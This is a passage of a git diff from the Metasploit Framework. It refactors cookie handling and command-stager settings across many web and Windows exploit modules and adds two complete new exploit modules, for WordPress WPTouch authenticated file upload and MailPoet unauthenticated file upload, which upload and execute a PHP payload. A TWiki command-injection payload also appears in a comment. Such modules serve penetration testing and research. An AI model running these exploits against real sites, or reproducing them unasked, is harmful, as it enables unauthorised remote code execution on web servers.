@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res and res.code == 303
-      @session_id = res["Set-Cookie"]
+      @session_id = res.get_cookies
       print_good "#{peer} - Authentication successful"
     end
   end
diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb
index 1d13b0c83f..87d0ffbb1c 100644
--- a/modules/exploits/unix/webapp/havalite_upload_exec.rb
+++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb
@@ -130,4 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Executing #{fname}...")
     exec(base, fname)
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
index 90a1877755..5b599d3180 100644
--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -141,4 +141,4 @@ class Horde_Kolab_Server_Decorator_Clean
 
 $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
index d3d21d0547..930db07be9 100644
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'GET'
       })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
+    if res and res.code == 200 and res.get_cookies =~ /(.+)session/
       print_status("#{peer} - Cookie prefix #{$1} found")
       cookie_prefix = $1
     end
diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 9645358c82..fa6e2b56d8 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Checking Access to Media Component...")
     res = get_upload_form
 
-    if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
+    if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/
       print_status("#{peer} - Authentication required... Proceeding...")
 
       if @username.empty? or @password.empty?
@@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if not res or res.code != 303
         fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate")
       end
-    elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
+    elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/
       print_status("#{peer} - Authentication isn't required.... Proceeding...")
       @cookies = res.get_cookies.sub(/;$/, "")
     else
diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb
index 4bba1a2ef0..edb7fa1917 100644
--- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb
+++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb
@@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
         Nagios3 history.cgi script.
       },
       'Author'         => [
-        'Unknown <temp66@gmail.com>',		    # Original finding
-        'blasty <blasty@fail0verflow.com>',	    # First working exploit
-        'Jose Selvi <jselvi@pentester.es>',	    # Metasploit module
+        'Unknown <temp66[at]gmail.com>',		    # Original finding
+        'blasty <blasty[at]fail0verflow.com>',	    # First working exploit
+        'Jose Selvi <jselvi[at]pentester.es>',	    # Metasploit module
         'Daniele Martini <cyrax[at]pkcrew.org>'	# Metasploit module
       ],
       'License'        => MSF_LICENSE,
diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb
index 0295f0f7db..9497ece6fd 100644
--- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb
+++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     return '' if !res
 
     nsp = res.body.scan(/<input type='hidden' name='nsp' value='(.+)'>/).flatten[0] || ''
-    cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0]  || ''
+    cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0]  || ''
     return nsp, cookie
   end
 
diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
index a795414f59..d563f00ad0 100644
--- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
+++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
         }
     })
 
-    if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/
+    if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/
       session = $1
       print_status("#{rhost}:#{rport} - Login successful")
       print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]")
diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
index 3bf1ab9d2d..7f7da159ed 100644
--- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         option is enabled (common for hosting providers). All versions of WordPress prior to
         1.5.1.3 are affected.
       },
-      'Author'         => [ 'str0ke <str0ke [at] milw0rm.com>', 'hdm' ],
+      'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'hdm' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb
index 2ee3f4a4b5..591fcc8ba0 100644
--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
     token = $1
-    cookie = response["Set-Cookie"]
+    cookie = response.get_cookies
 
     # There is probably a great deal of randomization that can be done with
     # this format.
diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
index 1a91c5763e..ad723c98d9 100644
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'    => "user=#{user}&pass=#{pass}",
     }, 25)
 
-    if (res)
+    if res
       print_status("Successfully logged in as #{user}:#{pass}")
 
-      if (res.headers['Set-Cookie'] =~ /my_id=(.*)/)
+      if res.get_cookies =~ /my_id=(.*)/
         session = $1
         print_status("Successfully retrieved cookie: #{session}")
         return session
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
index e9116a64bd..cacbeb0e67 100644
--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'   => data
     })
 
-    if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
+    if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty?
       print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
       return
     end
 
-    if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
+    if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/
       session_id = $1
     else
       print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index 133b26b8a0..096f669368 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status "We received the expected HTTP code #{target_code}"
 
     # We will need the cookie PHPSESSID to continue
-    cookies = response.headers['Set-Cookie']
+    cookies = response.get_cookies
 
     # Make sure cookies were set
     if defined? cookies and cookies =~ PHPSESSID_REGEX
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status "The server responded to POST with HTTP code #{delivery_response.code}"
 
     # We will need the cookie PHPSESSID to continue
-    cookies = delivery_response.headers['Set-Cookie']
+    cookies = delivery_response.get_cookies
 
     # Make sure cookies were set
     if cookies.nil?
diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb
index 5a931d0f21..47bcba11be 100644
--- a/modules/exploits/unix/webapp/twiki_maketext.rb
+++ b/modules/exploits/unix/webapp/twiki_maketext.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
         }
       })
 
-    if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/
+    if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/
       return nil
     end
 
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_good("crypttoken found: #{crypttoken}")
 
     if session.empty?
-      if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
+      if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/
         session = $1
       else
         vprint_error("Error using anonymous access")
@@ -225,4 +225,4 @@ end
 
 %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
index 4d27bc797b..9194c0958b 100644
--- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
+++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
@@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
+    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty?
       session = res.get_cookies
     else
       return nil
diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
index dcf88c8a12..a03c8ad083 100644
--- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
+++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
@@ -28,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
-          'AverageSecurityGuy <stephen@averagesecurityguy.info>', # Metasploit Module
+          'Adam Caudill <adam[at]adamcaudill.com>', # Vulnerability discovery
+          'AverageSecurityGuy <stephen[at]averagesecurityguy.info>', # Metasploit Module
           'sinn3r', # Metasploit module
           'juan vazquez' # Metasploit module
         ],
diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
index 9de059083a..b118f8867f 100644
--- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
+++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
@@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'    => data
       }, 25)
 
-    if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
+    if res and res.code == 302 and res.get_cookies =~ /sid/
       vprint_good "#{peer} - Authentication successful"
-      session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
+      session = res.get_cookies.split("sid=")[1].split(";")[0]
     else
       vprint_error "#{peer} - Service found, but authentication failed"
       return Exploit::CheckCode::Detected
@@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'    => data
       }, 25)
 
-    if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
-      session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
+    if res and res.code == 302 and res.get_cookies =~ /sid/
+      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
       if session and not session.empty?
         print_good "#{peer} - Authentication successfully"
       else
diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
index d52ecda3a8..917730eeac 100644
--- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
+++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
@@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
     end
 
-    admin_cookie = ''
-    (res.headers['Set-Cookie'] || '').split(',').each do |cookie|
-      admin_cookie << cookie.split(';')[0]
-      admin_cookie << ';'
-    end
+    admin_cookie = res.get_cookies
 
     if admin_cookie.empty?
       fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty')
diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
new file mode 100644
index 0000000000..864fd2bec7
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress WPTouch Authenticated File Upload',
+      'Description'    => %q{
+          The Wordpress WPTouch plugin contains an auhtenticated file upload
+          vulnerability. A wp-nonce (CSRF token) is created on the backend index
+          page and the same token is used on handling ajax file uploads through
+          the plugin. By sending the captured nonce with the upload, we can
+          upload arbitrary files to the upload folder. Because the plugin also
+          uses it's own file upload mechanism instead of the wordpress api it's
+          possible to upload any file type.
+          The user provided does not need special rights. Also users with "Contributer"
+          role can be abused.
+      },
+      'Author'         =>
+        [
+          'Marc-Alexandre Montpas', # initial discovery
+          'Christian Mehlmauer'     # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['wptouch < 3.4.3', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 14 2014'))
+
+    register_options(
+      [
+        OptString.new('USER', [true, "A valid username", nil]),
+        OptString.new('PASSWORD', [true, "Valid password for the provided username", nil]),
+      ], self.class)
+  end
+
+  def user
+    datastore['USER']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wptouch', 'readme.txt')
+    res = send_request_cgi({
+      'uri'    => readme_url,
+      'method' => 'GET'
+    })
+    # no readme.txt present
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    # try to extract version from readme
+    # Example line:
+    # Stable tag: 2.6.6
+    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
+
+    # readme present, but no version number
+    if version.nil?
+      return Msf::Exploit::CheckCode::Detected
+    end
+
+    vprint_status("#{peer} - Found version #{version} of the plugin")
+
+    if Gem::Version.new(version) < Gem::Version.new('3.4.3')
+      return Msf::Exploit::CheckCode::Appears
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
+  end
+
+  def get_nonce(cookie)
+    res = send_request_cgi({
+      'uri'    => wordpress_url_backend,
+      'method' => 'GET',
+      'cookie' => cookie
+    })
+
+    # forward to profile.php or other page?
+    if res and res.code.to_s =~ /30[0-9]/ and res.headers['Location']
+      location = res.headers['Location']
+      print_status("#{peer} - Following redirect to #{location}")
+      res = send_request_cgi({
+        'uri'    => location,
+        'method' => 'GET',
+        'cookie' => cookie
+      })
+    end
+
+    if res and res.body and res.body =~ /var WPtouchCustom = {[^}]+"admin_nonce":"([a-z0-9]+)"};/
+      return $1
+    else
+      return nil
+    end
+  end
+
+  def upload_file(cookie, nonce)
+    filename = "#{rand_text_alpha(10)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"myfile\"; filename=\"#{filename}\"")
+    data.add_part('homescreen_image', nil, nil, 'form-data; name="file_type"')
+    data.add_part('upload_file', nil, nil, 'form-data; name="action"')
+    data.add_part('wptouch__foundation__logo_image', nil, nil, 'form-data; name="setting_name"')
+    data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"')
+    post_data = data.to_s
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => wordpress_url_admin_ajax,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => post_data,
+      'cookie'   => cookie
+    })
+
+    if res and res.code == 200 and res.body and res.body.length > 0
+      register_files_for_cleanup(filename)
+      return res.body
+    end
+
+    return nil
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to login as #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as #{user}")
+      return
+    end
+
+    print_status("#{peer} - Trying to get nonce")
+    nonce = get_nonce(cookie)
+    if nonce.nil?
+      print_error("#{peer} - Can not get nonce after login")
+      return
+    end
+    print_status("#{peer} - Got nonce #{nonce}")
+
+    print_status("#{peer} - Trying to upload payload")
+    file_path = upload_file(cookie, nonce)
+    if file_path.nil?
+      print_error("#{peer} - Error uploading file")
+      return
+    end
+
+    print_status("#{peer} - Calling uploaded file #{file_path}")
+    res = send_request_cgi({
+      'uri'    => file_path,
+      'method' => 'GET'
+    })
+  end
+end
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
new file mode 100644
index 0000000000..0ef6b962e0
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
+      'Description'    => %q{
+          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
+          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
+          functionality to upload a zip file containing the payload. The plugin uses the
+          admin_init hook, which is also executed for unauthenticated users when accessing
+          a specific URL. The first fix for this vulnerability appeared in version 2.6.7,
+          but the fix can be bypassed. In PHP's default configuration,
+          a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
+          uses $_REQUEST to check for access rights. By setting the POST parameter to
+          something not beginning with 'wysija_', the check is bypassed. Wordpress uses
+          the $_GET array to determine the page, so it is not affected by this.
+      },
+      'Author'         =>
+        [
+          'Marc-Alexandre Montpas', # initial discovery
+          'Christian Mehlmauer'     # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
+          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
+          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 1 2014'))
+  end
+
+  def create_zip_file(theme_name, payload_name)
+    # the zip file must match the following:
+    #  -) Exactly one folder representing the theme name
+    #  -) A style.css in the theme folder
+    #  -) Additional files in the folder
+
+    content = {
+      ::File.join(theme_name, 'style.css') => '',
+      ::File.join(theme_name, payload_name) => payload.encoded
+    }
+
+    zip_file = Rex::Zip::Archive.new
+    content.each_pair do |name, content|
+      zip_file.add_file(name, content)
+    end
+
+    zip_file.pack
+  end
+
+  def check
+    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
+    res = send_request_cgi({
+      'uri'    => readme_url,
+      'method' => 'GET'
+    })
+    # no readme.txt present
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    # try to extract version from readme
+    # Example line:
+    # Stable tag: 2.6.6
+    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
+
+    # readme present, but no version number
+    if version.nil?
+      return Msf::Exploit::CheckCode::Detected
+    end
+
+    print_status("#{peer} - Found version #{version} of the plugin")
+
+    if Gem::Version.new(version) < Gem::Version.new('2.6.8')
+      return Msf::Exploit::CheckCode::Appears
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    theme_name = rand_text_alpha(10)
+    payload_name = "#{rand_text_alpha(10)}.php"
+
+    zip_content = create_zip_file(theme_name, payload_name)
+
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')
+
+    data = Rex::MIME::Message.new
+    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
+    data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
+    data.add_part('themeupload', nil, nil, 'form-data; name="action"')
+    data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
+    post_data = data.to_s
+
+    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
+
+    print_status("#{peer} - Uploading payload to #{payload_uri}")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => uri,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
+      'data'     => post_data
+    })
+
+    if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
+      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    # Files to cleanup (session is dropped in the created folder):
+    #   style.css
+    #   the payload
+    #   the theme folder (manual cleanup)
+    register_files_for_cleanup('style.css', payload_name)
+
+    print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
+
+    print_status("#{peer} - Executing payload #{payload_uri}")
+    res = send_request_cgi({
+      'uri'    => payload_uri,
+      'method' => 'GET'
+    })
+  end
+end
diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb
index 8558d6edcb..bebf122f74 100644
--- a/modules/exploits/unix/webapp/zeroshell_exec.rb
+++ b/modules/exploits/unix/webapp/zeroshell_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::EXE
 
   def initialize(info={})
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
       [
        OptString.new('TARGETURI', [true, 'The base path to the ZeroShell instance', '/'])
       ], self.class)
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def uri
@@ -149,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     @session = login(admin_password)
 
-    execute_cmdstager
+    execute_cmdstager({:flavor => :echo})
   end
 
 end
diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb
index e4508a5448..6191617631 100644
--- a/modules/exploits/unix/webapp/zpanel_username_exec.rb
+++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "#{peer} - Login failed")
     end
 
-    res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || ''
+    res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || ''
   end
 
 
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res
 
     token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || ''
-    sid   = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || ''
+    sid   = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || ''
     fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty?
 
     return token, sid
diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
index 5e3cd321ae..09f2c79820 100644
--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Privileged' => true,
       'Platform' => 'win',
+      'CmdStagerFlavor' => 'tftp',
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Jul 26 2010'))
 
@@ -50,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb
index 1148ae14c0..e95fe434c9 100644
--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
+      'CmdStagerFlavor' => 'tftp',
       'Privileged' => true,
       'Platform' => 'win',
       'DefaultTarget' => 0,
@@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
index ff2e97a734..00c27e5917 100644
--- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include REXML
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
         Opt::RPORT(9090),
         OptString.new('TARGETURI', [true, 'The base path', '/'])
       ], self.class)
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     print_status("#{peer} - Sending payload")
     # Execute the cmdstager, max length of the commands is ~3950
-    execute_cmdstager({:linemax => 3950})
+    execute_cmdstager({:flavor => :vbs, :linemax => 3950})
   end
 
   def execute_command(cmd, opts = {})
